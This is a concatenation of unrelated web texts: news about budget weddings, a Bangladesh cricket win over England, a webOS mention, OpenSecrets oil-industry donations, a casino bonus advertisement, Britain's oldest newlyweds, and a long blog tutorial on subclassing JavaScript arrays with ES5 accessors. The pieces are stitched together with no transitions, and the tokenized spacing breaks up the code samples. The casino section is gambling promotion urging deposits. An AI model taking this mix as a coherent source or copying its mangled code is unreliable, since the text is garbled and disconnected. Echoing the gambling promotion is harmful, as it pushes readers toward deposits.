But it 's not always easy to have an offbeat wedding .
Some wedding experts caution the bride may not have enough time to handle the extra responsibilities .
Other brides say they still feel families and friends expect them to throw a lavish , traditional wedding .
" There was so much pressure on everything , " said former bride Meg Keene , founder of the blog A Practical Wedding .
" Everything was presented as obviously this is the option you 'll choose , if you want it to be a good wedding . "
For Sifuentes , throwing a bowling alley wedding came with some hesitation .
She worried about what some guests would think about her cutbacks .
" I was concerned that I was going to come off as a cheap bride or not having a very nice wedding , " she said .
" I did n't want it to be a tacky wedding . "
But her bowling alley wedding turned out to be classy , she said .
About 70 of the couple 's closest friends and family members joined them to feast on an Italian buffet .
There was plenty of dancing , but they also found time to bowl .
A Brides.com survey in 2009 also found brides are watching expenses .
Four out of five couples set a budget for their wedding .
Half the brides will spend time researching financing for the ceremony and reception , the survey said .
" People are being smarter , " said Ali Phillips , owner of a wedding planning boutique firm , Engaging Events by Ali , in Chicago .
" They are asking themselves :
Do we really need to have the fancy chairs ?
Do you really have to give wedding favors ? "
Phillips , who has been a wedding consultant for nine years , said she noticed clients making cutbacks to guest lists and choosing fewer upgrades this year .
For example , five years ago , the average guest list contained about 180 people .
This year , the guest lists have about 120 people .
Jennifer Crawford , 30 , of Huntington Beach , California , kept her wedding budget a priority .
At her wedding in April , she shaved costs by having a seamstress copy the style of her dream gown that retailed at $ 2,800 at a boutique .
Her handmade replica was a fraction of the cost -- $ 650 .
" What was best about this idea was being personally involved in the design process , " Crawford said .
" I did not want a cookie - cutter dress .
I wanted it to be special and fun . "
In Oklahoma , bride - to - be Ashley Heckathorn , 24 , estimated she will save up to $ 15,000 by making her own bouquets , which will save her from whittling down the guest list .
She is relying on Craigslist and friends ' talents to find deals for her wedding , set for June 2011 in New Orleans , Louisiana .
Some wedding experts say the wedding industry is recovering .
Xochitl Gonzalez , a wedding consultant at Always a Bridesmaid in New York , said her guests are n't as afraid to spend money on the ceremony and reception as they were when the economy initially plummeted .
Rebecca Dolgin , executive editor at The Knot.com , said weddings are recession proof .
But Dolgin said she noticed brides are shopping more carefully and comparing deals for their weddings .
" People generally only get married once , " Dolgin said .
" There may be ebbs and flows in the economy , but they are always going to look back on their wedding day . "
Bangladesh 236 for 7 ( Kayes 76 , Shahzad 3 - 41 ) beat England 231 ( Trott 94 , Shafiul 2- 38 ) by five runs
Scorecard and ball - by - ball details
A pumped - up Rubel Hossain removed Craig Kieswetter and Andrew Strauss Getty Images
Bangladesh produced a performance of immense spirit and character as they secured their first victory over England in any format with a famous five - run win at Bristol .
In an extraordinary finale , Ian Bell limped out at No. 11 with a broken foot to accompany Jonathan Trott , but Trott edged a cut off the third ball of the final over bowled by Shafiul Islam after making 94 to send Bangladesh into scenes of wild celebration .
Trott had taken 13 off the five balls in the penultimate over from Mashrafe Mortaza , but James Anderson could only pop the final delivery back to the bowler .
Bangladesh thought that was the victory and began ripping up the stumps in celebration , but Bell hobbled down the steps with Morgan as his runner and hoped that Trott could get the 10 needed from final over .
He managed consecutive twos , but then tried to go through the off side and edged to the wicketkeeper to leave him disconsolate at the crease .
He did n't even remark his guard .
What makes Bangladesh 's success even more remarkable is the state in which they entered this game .
Two leading players , Raqibul Hasan who top - scored at Trent Bridge and wicketkeeper Mushfiqur Rahim , had been ruled out of the series and one of their replacements , Mohammad Ashraful only arrived in the country 14 hours before the toss .
Add to that Bangladesh 's 24 - match losing run and the previous inability of their attack to assert any pressure and this has to go down as one of the more remarkable reversals .
After the batsmen had again stuttered the bowlers lifted themselves , led by the efforts of Rubel Hossain and Abdur Razzak who shared four crucial top - order wickets as the hosts ' batting suffered a collective malfunction .
Trott kept England in with a chance as he added 43 with Stuart Broad , but when Broad drove to point and Mortaza only conceded three from the 48th over the balance of the game tilted towards Bangladesh .
When Imrul Kayes had laboured to a worthy , but uninspired , 76 in Bangladesh 's total of 236 for 7 - during which they scored just 87 in the last 20 overs - it appeared all they had done was keep their head above water and avoid humilation .
As Andrew Strauss and Craig Kieswetter added 49 in 7.5 overs it was a question of how many overs England would have to spare at the end .
Maybe England were even starting to think that way , having played Bangladesh on eight previous occasions this year and witnessed they inability to maintain pressure .
Michael Yardy , Luke Wright and Ajmal Shahzad played horrid shots when they had a chance to prove their bottle for a tense run chase .
England have occasionally taken their eye off the ball before in both Tests and ODIs , but have had the experience and class to pull the situation .
Not this time , and the problems started when the openers gave their wickets away in quick succession as happened at Trent Bridge .
Rubel , whose recall suddenly looked inspired , sparked the team into life with a bustling display .
In his first over Strauss tried to guide the ball over the slips and feathered a catch to the stand - in keeper Jahurul Islam , who looked more than competent as Musfiqur 's replacement .
Rubel struck again in his next over as Kieswetter played a flat - footed drive to give the keeper his second chance and Bangladesh were unlucky not to make it two wickets in two balls .
Collingwood flashed hard at his first delivery and the fielding side were convinced of the edge , so much so that Rubel and Jahurul were well into their celebrations when umpire Richard Illingworth turned them down .
Subsequent replays confirmed a healthy edge but to Bangladesh 's credit they continued to maintain their discipline and keep the run-rate down .
Collingwood broke the shackles when he pulled Rubel for six before the scales evened themselves as Collingwood was given lbw to Razzak despite a big inside edge onto his pad .
Even the batsman had a rueful smile as he made his way off .
Morgan , who was England 's saviour when they came close to defeat in Dhaka earlier this year , began with an edge through the vacant slip cordon but collected his first failure of the ODI season when he tried to turn Razzak into the leg side .
Still , if England want to become the best one - day team in the world they can't rely on Morgan 's freakish skills .
Trott 's style could n't be more mundane in comparison to Morgan , but he now became vital for England 's chase .
He kept losing partners as Yardy had a horrid swipe across the line , a shot replicated by Shahzad as the asking rate grew , while Wright 's regression after a promising start against Australia continued when he edged a wild drive to slip where Junaid Siddique held on at the second attempt .
At times Trott still seemed in his own little world as he pushed singles with the required rate climbing past seven an over , but in the penultimate over he sparked into life and for a few moments it appeared Bangladesh would bottle their chance again .
Shafiul , whose first over had cost 12 , held his nerve and England can't say they did n't have the result coming after another indifferent display in the field .
Shahzad was the pick of the attack removing Tamim Iqbal early and returning to grab Jahurul and top - scorer Kayes as he claimed 3 for 41 .
However , his fielding was a concern as he missed Kayes at gully and then watched another ball sail over his head at third man after he'd run in too quickly .
Anderson 's difficult time with the new ball continued as his first spell of four overs cost 24 and Bangladesh built a strong foundation as Kayes and Jahurul added 83 for the third wicket .
England again had to take pace off the ball through Yardy and Collingwood to assert themselves and once Jahurul was caught behind the innings faded like it had at Trent Bridge .
The last 20 overs brought just 87 runs but , in what would prove crucial in the final outcome , Mortaza managed to connect with some hefty blows during the batting Powerplay .
Still , it looked like a formality for England to take the series but a few hours later it was a chastened home dressing room that had to watch the jubilant Bangladesh players sprint around the outfield in celebration .
HP's Jon Rubinstein -- formerly of Palm CEO fame , of course -- just mentioned in an interview with Fortune that webOS 2.0 is on track for " later this year . "
Considering that 2010 is more than half over , that does n't leave a whole heck of a lot of time -- but with a mix of presumed kick - ass HP hardware in the pipeline running webOS , we imagine this should all dovetail nicely .
On a related note , Rubinstein again drove home the point that they 're developing new hardware " aggressively , " so let 's hope we finally see a Pre 2 , a Palmpad , or heck , a frickin ' LifeDrive 2 in the next few months .
FYI this was The Boy waiting to take his Driver ’s License exam earlier today .
He passed .
For those of you following along since he was wearing teddy bear headphones at the earliest CHSHes , I just thought you ’d want to mark this occasion .
Related :
We ’re all old .
Your daily dose of news and tidbits from the world of money in politics :
Lincoln has this election cycle indeed received more cash — $ 286,400 and counting — than any other congressional member from people and political action committees associated with the oil industry .
The advertisement also accurately notes ( citing OpenSecrets.org as its source ) that Lincoln has taken more than $ 550,000 from oil and gas interests for her career .
What the advertisement does n’t state : the oil and gas industry has funneled six - figure chunks of campaign cash to a dozen different congressional members this election cycle , a Center for Responsive Politics analysis indicates .
Another five candidates looking to unseat incumbents have also received more than $ 100,000 from the oil and gas industry .
Lincoln places third on our list , with $ 4,000 in BP - related contributions , our records show .
Democratic Senate candidate Jack Conway of Kentucky is first , with $ 9,600 , followed by Murkowski , with $ 7,000 .
As for the Lincoln ad itself , watch it here :
For permission to reprint for commercial uses , such as textbooks , contact the Center : Feel free to distribute or cite this material , but please credit the Center for Responsive Politics .
For permission to reprint for commercial uses , such as textbooks , contact the Center : [ email protected ]
·
·
·
·
·
·
·
Support Accountability Journalism
At OpenSecrets.org we offer in - depth , money - in - politics stories in the public interest .
Whether you ’re reading about 2020 presidential fundraising , conflicts of interest or “ dark money ” influence , we produce this content with a small , but dedicated team .
Every donation we receive from users like you goes directly into promoting high - quality data analysis and investigative journalism that you can trust .
Please support our work and keep this resource free .
Thank you .
Support OpenSecrets ➜
Read more OpenSecrets News & Analysis :
With the constant growth in the online casino world , there has never been a better time to take advantage of the superb bonus offers available .
New casinos generate healthy competition and bonuses are a key element in attracting and retaining new players .
Take your choice from Casino Bonus , No Deposit Bonuses , Free Spins and more !
Types Of Welcome Bonus
One of the most attractive bonuses is the Welcome Bonus , which is reserved for new members on registration .
This normally offers a matched deposit amount with a specific percentage .
For instance , a matched bonus of 100 % , with a maximum deposit of £ 200 , means that players depositing the full £ 200 will have a total of £ 400 to play with .
Along with this , casinos usually offer a number of Free Spins on specified slots , and it is possible to find more than 300 spins to enjoy .
Some casinos also offer players No Deposit Free Spins just for registering , which means that you are not under any obligation to make a money deposit .
There can be wagering requirements attached to these bonuses , so be sure to always check out the terms before playing .
No Deposit Bonuses
You can also find many No Deposit Bonuses to entice players .
These can come in the form of a free money bonus , for instance , a small amount of £ 5 or £ 10 to play with , as soon as you register .
There may be restrictions on the games you can play and some terms attached , but they are still an attractive and enticing incentive .
Ongoing Loyalty Promotions
Following on from this , it ’s always worth looking at the regular bonuses and loyalty schemes that are available .
A good casino will have some great offers including Reload bonuses , cash , extra spins and further matched deposits .
Loyalty programmes will normally go hand in hand with a VIP system of levels .
Players are awarded points for playing and access higher levels to earn greater rewards .
These can bring access to tournaments and some spectacular prizes and promotions .
I 'm just married at ...
97 !
Meet Britain 's oldest newlyweds , with a combined age of 184
When Henry Kerr met an attractive younger woman , he feared she would n't give an older man a second glance .
So he embarked on a four - year campaign to win over the object of his affections , writing her love poetry and spending hours exchanging life stories .
And yesterday , 97 - year - old Mr Kerr proved you can't hurry love , when he finally wed his younger companion - Valerie Berkowitz , 87 .
Wedded bliss : Henry Kerr , aged 97 dances with Valerie Berkowitz , aged 87 on the occasion of their marriage
He said : ' I would have asked her much earlier , if I had thought such an attractive , witty young lady of 87 would have anything to do with an old codger like me . '
Mr Kerr believed his love life was over following his wife Gladys 's death in 2004 , but said he was ' struck like a thunderbolt ' when he met Mrs Berkowitz at the North London care home they share .
He said : ' I thought she found me pushy and conceited - until she acquired an analytical interest in the poems I read at the poetry circle I founded when I moved in here .
Then we found our affinities .'
The accolade of being Britain 's oldest newlyweds goes to Henry Kerr and Valerie Berkowitz ( pictured here on their wedding day ) .
They had a combined age of 184 years when they married in 2010
When they started talking , the pair discovered they had both lived in South Africa , and both had families scattered across the world .
He wrote several love poems in an attempt to win her affections .
Mr Kerr , who moved to the care home in 2006 when he was 94 , said : ' When I did ask her to marry me a few months ago she went hysterical - she put her head down on the table and could n't stop laughing . '
Even once Mrs Berkowitz had accepted the proposal , the couple expected to stay permanently engaged to avoid the ' complication ' of marriage .
But Mr Kerr , who ran an investment company before retirement , said : ' I felt people were whispering behind their hands and gossiping about us moving in together , and that it was important for us to be Mr and Mrs . '
The couple finally married in a traditional Jewish ceremony yesterday at their care home in Golders Green , followed by a high tea for 90 guests .
The newlyweds , who have six children , 19 grandchildren and seven great - grandchildren between them , will embark on a one - day honeymoon today but plan to keep its location a secret .
The new Mrs Kerr , a former biochemist and counsellor whose first husband Abraham died in 2005 at the age of 82 , said : ' Almost immediately after Henry arrived at the home , we started gravitating towards each other , from breakfast on .
' He is so totally talented and full of fun , yet also very serious .
' He 's different from my late husband in every way , except that they both had enormous brain power .
It 's absolutely incredible that we found each other so late in life and that we are so loving - and lovely - together .
' We go to museums and galleries and theatres in groups - but we are off for a day trip honeymoon all by ourselves , and are thinking about a cruise . '
Mr and Mrs Kerr will keep their two rooms at the home , although they will use one as a bedroom and another as a study .
The couple have also walked away with the title of Britain 's oldest newlyweds - previously held by Les Atwell , 94 , and Sheila Walsh , 87 .
5284 words
Subclassing an array in Javascript has never been a trivial task .
At least for a certain meaning of “ subclassing an array ” .
Curiously , new edition of the language — ECMAScript 5 — still does not allow to fully subclass an array .
Not everything is lost though , and there are few ways ECMAScript 5 makes this task closer to the ideal .
However , there are few fundamental issues which prevent true array subclassing from happening .
Let ’s talk about that .
Today we ’ll take a look at what it means to subclass an array , what some of the existing implementations / workarounds are , and which drawbacks those implementations have ;
We ’ll see what ECMAScript 5 brings to the table , and what those fundamental issues with subclassing are .
We ’ll also talk about alternative approaches to subclassing an array , such as using wrappers , and get to know their limitations .
But first , what does it mean to subclass an array ?
And why do we even need it ?
Why subclass an array ?
We can define " subclassing an array " as the process of creating an object which inherits from native Array object ( has Array. prototype in its prototype chain ) , and follows behavior similar ( or identical ) to native array .
The last point about behavior similar to native array is actually very important , as we ’ll see later on .
Having “ subclass ” of array could be thought of as being able to create an array object , but an object which would inherit not directly from Array , but from another object , and only then from Array .
In other words , we want behavior similar to this :
var sub = new SubArray ( 1 , 2 , 3 ) ; sub ; // [ 1 , 2 , 3 ] sub.length ; // 3 sub [ 1 ] ; // 2 sub.push ( 4 ) ; sub ; // [ 1 , 2 , 3 , 4 ] // etc. sub intanceof SubArray ; // true sub intanceof Array ; // true
Note how SubArray constructor creates a sub object identical in its behavior to array ( object has “ length ” property , numeric “ 0 ” , “ 1 ” , “ 2 ” properties , and inherits Array. prototype .* methods ) .
At the same time , it is SubArray that a sub object directly inherits from , not Array .
So what exactly is the purpose of doing all this ?
Why subclass an array in such way ?
There are usually two reasons :
1. Avoid pollution of global Array
Javascript prototypal nature makes it easy to extend all array objects with custom methods .
Instead of assigning to direct properties of array objects , it ’s much easier and more efficient to assign to array ’s “ prototype ” object ( the one that ’s usually accessed via Array .
prototype ) .
Array.prototype.last = function ( ) { return this [ this.
length - 1 ] ; } ; // ... [ 1 , 2 , 3].last ( ) ; // 3
However , extending Array .
prototype comes with the price ;
And that price is chance of collisions .
When scripts coexist with other scripts in an application , it ’s important for those scripts not to conflict with each other .
Extending Array .
prototype , while tempting and seemingly useful , unfortunately is n’t very safe in a diverse environment .
Different scripts can end up defining same - named methods , but with different behavior .
Such scenario often leads to inconsistent behavior and hard - to - track errors .
Collisions can happen not only with user - defined code , but also with proprietary methods implemented by environment itself ( e.g. Array.prototype.indexOf from JavaScript 1.6 , before it was standardized by ES5 ) or from future standards ( e.g. Array.prototype.map , Array.prototype.reduce , etc. — now all part of ES5 ) .
Using constructor function other than native Array — but with same behavior — would allow to avoid such collisions .
Instead of extending Array .
prototype , another object would be extended ( say , SubArray. prototype ) and then used to initialize ( sub ) array objects .
Any third party code which depends on methods from Array .
prototype would still be able to safely use them .
2. Create data structures naturally inheriting from array
Another reason to subclass an array is to be able to create data structures , which naturally inherit from array ; such as Stack , List , Queue , Set , etc .
While there are certainly valid use cases for these structures , in this article I will instead focus on the first aspect — reducing chance of collisions .
It is somewhat more relevant in context of cross - browser scripting .
Naive approach
Creating objects that inherit from other objects is more or less straightforward in Javascript .
We can use well - known clone method :
function clone ( obj ) { function F ( ) { } F.prototype = obj ; return new F( ) ; }
and then set - up inheritance like this :
function Child ( ) { } Child.prototype = clone ( Parent.prototype ) ;
clone might look confusing , but all it does is create an object with another object as nearest ancestor in its prototype chain .
It uses intermediate function to avoid executing " parent " constructor .
In this example , new Child creates an object with Child . prototype as first object in the prototype chain , Parent .
prototype — second , and so on .
To visualize , the prototype chain here looks like this :
new Child ( ) | | [ [ Prototype ] ] | v Child. prototype | | [ [ Prototype ] ] | v Parent. prototype | | [ [ Prototype ] ] | v Object.
prototype | | [ [ Prototype ] ] | v null
Using clone method is exactly what person attempts when trying to subclass an array for the first time :
function SubArray ( ) { //
Take any arguments passed to constructor and add them to an instance this .
push.apply ( this , arguments ) ; } SubArray.prototype = clone ( Array.prototype ) ; var sub = new SubArray ( 1 , 2 , 3 ) ;
The approach seems reasonable .
After all , the goal is to create an object that inherits from Array , so there ’s no reason tried - and - true clone would n’t work .
Or is there ?
As with few other things in Javascript , it ’s not as trivial as it seems .
Problems with naive approach
So what exactly is wrong with subclassing array using clone method ?
Let ’s take a look at how previously declared SubArray function behaves .
We ’ll be using native array object alongside , for comparison .
var arr = new Array ( 1 , 2 , 3 ) ; var sub = new SubArray ( 1 , 2 , 3 ) ; arr.length ; // 3 sub.length ; // 0 ( in IE < 8 ) arr.length = 2 ; sub.length = 2 ; arr ; // [ 1 , 2 ] sub ; // [ 1 , 2 , 3 ] arr [ 10 ] = ' foo ' ; sub [ 10 ] = ' foo ' ; arr.length ; // 11 sub.length ; // 2
There ’s clearly some kind of inconsistency here .
Even not counting a bug in IE < 8 .
But what is this strange relation between length and numeric properties in array ?
And why does n’t subclassed array behave identical ?
To understand this , we need to look into what array objects in Javascript really are .
Special nature of arrays
It turns out that arrays in Javascript are almost like plain Object objects , except for one little difference in behavior .
The crux of this difference is summarized concisely in one paragraph of specification ( 15.4 ) :
Array objects give special treatment to a certain class of property names .
A property name P ( in the form of a string value ) is an array index if and only if ToString ( ToUint32 ( P ) ) is equal to P and ToUint32 ( P ) is not equal to 2^32 - 1 .
Every Array object has a length property whose value is always a nonnegative integer less than 2^32 .
The value of the length property is numerically greater than the name of every property whose name is an array index ; whenever a property of an Array object is created or changed , other properties are adjusted as necessary to maintain this invariant .
Specifically , whenever a property is added whose name is an array index , the length property is changed , if necessary , to be one more than the numeric value of that array index ; and whenever the length property is changed , every property whose name is an array index whose value is not smaller than the new length is automatically deleted .
This constraint applies only to properties of the Array object itself and is unaffected by length or array index properties that may be inherited from its prototype .
For those allergic to the condensed language of ECMA - 262 , here ’s a short summary .
Array objects treat “ numeric ” properties in a special way .
Whenever such property changes , value of array ’s “ length ” property is adjusted as well ; it ’s adjusted in such was as to make sure that it is always one more than the greatest numeric ( own ) property of an array .
Similarly , when “ length ” property is changed , numeric properties are adjusted accordingly ( but only those that are larger than value of “ length ” ) .
We have already seen relation between numeric properties and length in the previous example , but let ’s take a look at it again , step by step :
1 ) When array object is created , its “ length ” property is set to a value one more than the largest index of an array .
var arr = [ 'x ' , 'y ' , 'z ' ] ; arr.length ; // 3 ( 1 greater than largest index of an array — 2 in this case ) arr = [ ' foo ' ] ; arr.length ; // 1 ( 1 greater than largest index of an array — 0 in this case )
2 ) When numeric properties change , so does “ length ” change — to maintain the relationship of being 1 greater than the largest index .
var arr = [ 'x ' , 'y ' ] ; arr.length ; // 2 , as expected arr [ 2 ] = 'z ' ; // add another numeric property ( 2 ) larger than the largest existing one ( 1 ) arr.length ; // 3 — length is changed to be 1 greater than ( new ) largest index ( 2 )
3 ) When “ length ” property changes , numeric properties are adjusted in such way so that greatest index is 1 smaller than value of “ length ” .
var arr = [ 'x ' , 'y ' , 'z ' ] ; arr.length = 2 ; arr ; // [ 'x ' , 'y ' ] — note how last element ( z ) is deleted , because being at 2nd index , // it does n't satisfy criteria of largest index being 1 less than length arr . length = 4 ; arr ; // [ 'x ' , 'y ' ] — " increasing " length does n't affect numeric properties ... arr.join ( ) ; // " x , y , , " ... but has consequences visible in other cases , such as when using ` Array.prototype.join` arr.push ( 'z ' ) ; arr ; // [ 'x ' , 'y ' , undefined , undefined , 'z ' ] — ... or when using `Array.prototype.push`
Now you know the “ special ” nature of Array objects in Javascript , which is in the relationship between “ length ” and numeric properties .
One little detail we have n’t looked at is that array ’s “ length ” property MUST always have a value of non-negative integer less than 2^32 .
Whenever this condition is violated , a RangeError is thrown :
var arr = [ ] ; arr.length = Math.pow ( 2 , 32 ) ; // RangeError arr.length ; // 0 ( length is still 0 , as it initially was ) arr.length = Math.pow ( 2 , 32 ) - 1 ; // set length to maximum allowed value arr .
length ++; // RangeError ( when setting length explicitly ) arr.push (1 ) ; // RangeError ( or when setting length implicitly )
Function objects and [ [ Construct ] ]
It should start to make sense why there are discrepancies in behavior of objects created via SubArray and Array functions .
Even though SubArray creates an object that inherits from Array .
prototype , that object completely lacks array ’s special behavior .
The SubArray instance is nothing more than a plain Object object ( as if it was created via an object literal — { } ) .
But why does SubArray create an Object object and not an Array object ?
The core of this issue is in the way functions work in ECMAScript .
When new operator is applied to an object — as in new SubArray — that object ’s internal [ [ Construct ] ] method is called .
In our case , it is [ [ Construct ] ] of SubArray function .
SubArray — being a native function — has [ [ Construct ] ] that ’s specified to create a plain Object object , and invoke corresponding function providing newly created object as this value .
Any native function , including SubArray , should create an Object object and return it as a result .
Now it ’s worth mentioning that it ’s possible to sort of supersede return value of [ [ Construct ] ] by explicitly returning non-primitive value from constructor function :
function SubArray ( ) { this .push.apply ( this , arguments ) ; return [ ] ; // return array object explicitly }
— but in that case , returned object does NOT inherit from constructor ’s “ prototype ” ( SubArray .
prototype in this case ) ; neither is constructor function invoked with that object as this value :
var sub = new SubArray ( 1 , 2 , 3 ) ; //
Object does n't have 1 , 2 , 3 , as constructor was never called with `this` value referencing returned object sub ; // [ ]
//
SubArray is not in the prototype chain of returned object sub instanceof SubArray ; // false
As you can see , creating an object that inherits from Array .
prototype is only part of the story .
The biggest issue is to preserve the special relation of length and numeric properties .
This is why using regular clone approach is not quite up to the task .
The importance of array special behavior
A reasonable question at this point is —
“ Why does array special behavior matter ” ?
Why would we want to preserve relationship between length and numeric properties when subclassing an array ?
It turns out that consequences of proper length are not only visible when working with length directly , but also indirectly , when performing other tasks via Array .
prototype .* methods .
Take for example Array.prototype.push — a method to append items to the end of array .
To determine from which position to start inserting elements into , push retrieves a value of array ’s “ length ” .
If length is not preserved properly , elements are inserted at the wrong location :
var arr = [ 'x ' , 'y ' ] ; arr.length = 5 ; arr.push ( 'z ' ) ; // 'z ' is inserted at 5th index , since that is what the value of " length " is arr ; // [ 'x ' , 'y ' , undefined , undefined , undefined , 'z ' ]
Take another method — Array.prototype.join .
Used to return a representation of an array by concatenating all elements with a separator , Array.prototype.join also uses length property to determine when to stop concatenating values :
var arr = [ 'x ' , 'y ' ] ; arr.join ( ) ; // " x , y " arr.length = 5 ; arr.join ( ) ; // " x , y , , , "
Same goes for Array.prototype.concat — method used to produce a new array by concatenating values passed to concat :
var arr = [ 'x ' ] ; arr.length = 3 ; arr.concat ('y ' ) ; // [ 'x ' , undefined , undefined , 'y ' ]
Finally , the special behavior is often cleverly exploited in other situations , such as to “ clear ” an array ( i.e. delete all of its numeric properties ) :
var arr = [ 1 , 2 , 3 ] ; arr.length = 0 ; arr ; // [ ] — setting length to 0 effectively removes all numeric properties ( elements ) of an array
Existing solutions
Now that we 're familiar with the theory , let 's see what the situation is with subclassing arrays in practice .
There have been few attempts in the past , with various levels of “ success ” .
Here are a couple of most popular ones :
Andrea Giammarchi solution
One of the recent implementations is Stack , by Andrea Giammarchi , which looks like this :
var Stack = ( function ( ) { // ( C ) Andrea Giammarchi - Mit Style License function Stack ( length ) { if ( arguments .
length === 1 && typeof length === " number " ) { this .
length = - 1 < length && length === length << 1 >> 1 ? length : this .push ( length ) ; } else if ( arguments.length ) { this .push.apply ( this , arguments ) ; } } ; function Array ( ) { } ; Array.prototype = [ ] ; Stack.prototype = new Array ; Stack.prototype.length = 0 ; Stack.prototype.toString = function ( ) { return this.slice(0 ) .toString ( ) ; } ; Stack.prototype.constructor = Stack ; return Stack ; } ) ( ) ;
It 's an interesting solution , which mainly works around IE < 8 bug with Array .
prototype.push and length property .
However , as should be obvious by now , it does n't really solve the problem of maintaining relation between length and numeric properties :
var stack = new Stack ( 'x ' , 'y ' ) ; stack .
length ; // 2 // so far so good stack .
push ( 'z ' ) ; stack .
length ; // 3 // still good stack [ 3 ] = ' foo ' ; stack .
length ; // 3 // not good anymore ( length should have been changed to 4 ) stack .
length = 2 ; stack [ 2 ] ; // 'z' // still not good ( element at 2nd index should have been deleted )
Dean Edwards solution
Another popular solution is by Dean Edwards .
This one takes a completely different approach — instead of creating an object that inherits from Array .
prototype , an actual Array constructor is " borrowed " from the context of another iframe .
// create an < iframe > var iframe = document.createElement ( " iframe " ) ; iframe.style.display = " none " ; document.body.appendChild( iframe ) ; // write a script into the < iframe > and steal its Array object frames [ frames.
length - 1].document.write ( " < script>parent.Array2 = Array ; " ; ) ;
The reason this “ works ” is due to browsers creating separate execution environments for each frame in a document .
Each such environment has a separate set of both — built - in and host objects .
Built - in objects include global Array constructor , among others .
Array object of one iframe is different from Array object of another iframe .
They also do n’t have any kind of hierarchical relation :
// assuming that SubArray was borrowed from another iframe var sub = new SubArray ( 1 , 2 , 3 ) ; sub instanceof SubArray ; // true sub instanceof Array ; // false sub instanceof Object ; // false
Notice how sub is reported as NOT an instance of Array , and NOT an instance of Object .
This is because neither Array , nor Object are anywhere in the prototype chain of sub object .
Instead , prototype chain consists of SubArray .
prototype , followed by < Object from another iframe >. prototype :
new SubArray ( ) | | [ [ Prototype ] ] | v < another iframe >.
Array . prototype | | [ [ Prototype ] ] | v < another iframe >.
Object.prototype | | [ [ Prototype ] ] | v null
This brings us to one “ consideration ” with this approach — difficulties determining the nature of an object derived from such iframe .
It ’s no longer possible to determine that an object is an array using instanceof or constructor checks [ 1 ] :
// is this object an array ?
sub instanceof Array ; // false sub.constructor === Array ; // false
It is , however , still possible to use [ [ Class ] ] check ( we ’ll talk about [ [ Class ] ] later on ) :
Object.prototype.toString.call(sub ) === ' [ object Array ] ' ; // true
Another , more inherent , downside of this approach is that it does n’t work in non-browser environments ( or , more precisely , in any environment without support for iframes ) .
This problem is likely to become even bigger , given that server - side Javascript implementations are rising quite fast .
Finally , it was reported that Array borrowing can cause mixed content warning in IE6 , among few other minor issues .
Other than that , iframe - based array “ subclassing ” is free of downsides of solutions like Stack , since we ’re dealing with real array objects , and so proper length / indices relation .
ECMAScript 5 accessors to the rescue
But let ’s talk about ECMAScript 5 , which as I mentioned in the beginning , brings something that helps with subclassing arrays .
This “ something ” is actually nothing but property accessors .
These useful language constructs have been present in some popular implementations ( SpiderMonkey , JavaScriptCore , and others ) as a non-standard extension for quite a while now .
They are now standardized by the new edition of the language .
Using accessors , it ’s rather trivial to create an Object object with special length / indices relation — relation that ’s identical to that of Array objects !
And since we already know how to create an object with Array .
prototype in its prototype chain , combining these two aspects would allow for a complete emulation of arrays .
There ’s one little detail about implementation .
Since ECMAScript ( including last , 5th version ) does n’t provide any catch - all ( aka __noSuchMethod__ ) mechanism , it ’s not possible to change value of length property of an object when numeric property is modified ; in other words , we ca n’t intercept the moment when ‘ 0 ’ , ‘ 1 ’ , ‘ 2 ’ , ‘ 15 ’ , etc. properties are being set .
However , accessors allow us to intercept any read access of length property and return proper value , depending on which numeric properties object has at that moment .
This is all we really need .
Here ’s an implementation of it , at about 45 lines of code :
var makeSubArray = ( function ( ) { var MAX_SIGNED_INT_VALUE = Math.pow ( 2 , 32 ) - 1 , has OwnProperty = Object.prototype.hasOwnProperty ; function ToUint32 ( value ) { return value >>>
0 ; } function getMaxIndexProperty ( object ) { var maxIndex = - 1 , isValidProperty ; for ( var prop in object ) { isValidProperty = ( String ( ToUint32 ( prop ) ) === prop && ToUint32 ( prop ) !== MAX_SIGNED_INT_VALUE && has OwnProperty.call( object , prop ) ) ; if ( isValidProperty && prop > maxIndex ) { maxIndex = prop ; } } return maxIndex ; } return function ( methods ) { var length = 0 ; methods = methods || { } ; methods .
length = { get : function ( ) { var maxIndexProperty = + getMaxIndexProperty ( this ) ; return Math.max ( length , maxIndexProperty + 1 ) ; } , set : function ( value ) { var constrained Value = ToUint32 ( value ) ; if ( constrainedValue !== + value ) { throw new RangeError ( ) ; } for ( var i = constrained Value , len = this .
length ; i < len ; i++) { delete this [ i ] ; } length = constrainedValue ; } } ; methods .
toString = { value : Array.prototype.join } ; return Object.create( Array.prototype , methods ) ; } ; } ) ( ) ;
We can now create “ sub arrays ” via makeSubArray function .
It accepts one argument — an object with methods to add to [ [ Prototype ] ] of returned “ sub array ” .
var subMethods = { last : { value : function ( ) { return this [ this .
length - 1 ] ; } } } ; var sub = makeSubArray ( subMethods ) ; var sub2 = makeSubArray ( subMethods ) ; // etc .
We can also hide this factory method behind a constructor , to make it similar to Array ’s one :
var SubArray = ( function ( ) { var methods = { last : { value : function ( ) { return this [ this .
length - 1 ] ; } } } ; return function ( ) { var arr = makeSubArray ( methods ) ; if ( arguments. length === 1 ) { arr.length = arguments [ 0 ] ; } else { arr.push.apply ( arr , arguments ) ; } return arr ; } ; } ) ( ) ;
And then use it as you would use regular Array constructor :
var sub = new SubArray ( 1 , 2 , 3 ) ; sub.length ; // 3 sub ; // [ 1 , 2 , 3 ] sub.length = 1 ; sub ; // [ 1 ] sub [ 10 ] = ' x ' ; sub.push ( 1 ) ;
You can find this version of SubArray together with unit tests in Gtihub repository .
For brevity , I made this implementation mainly take care of length / indices relation ; certain methods ( e.g. concat ) do not behave identical to Array and need to be implemented accordingly .
[ [ Class ] ] limitations
The implementation we have just seen — the one utilizing property accessors — is great .
It does n’t require any host objects ( such as iframes ) ; it preserves relation between length and numeric properties ; it even disallows out - of - range values for length or indices .
All it requires is support for ES5 ( or even just Object. create method ) .
But the dramatic title of this post is not there just for fun .
There ’s one little detail we ’re missing in this otherwise complete implementation .
And that detail is proper [ [ Class ] ] value — something that ECMAScript still does n’t give full control over .
I wrote about [ [ Class ] ] before , when explaining how to detect arrays .
In a nutshell , [ [ Class ] ] is an internal property of objects in ECMAScript .
Its value is never exposed directly , but can still be inspected using certain methods ( e.g. Object.prototype.toString ) .
The usefulness of [ [ Class ] ] is that it allows to detect type of objects without relying on instanceof operator or checking object ’s constructor — both of which fall short to detect objects from other contexts ( e.g. iframes ) , as we ’ve seen earlier .
Now , since objects created by makeSubArray are nothing but plain Object objects ( only with special length getters / setters ) , their [ [ Class ] ] is also that of “ Object ” not an “ Array ” !
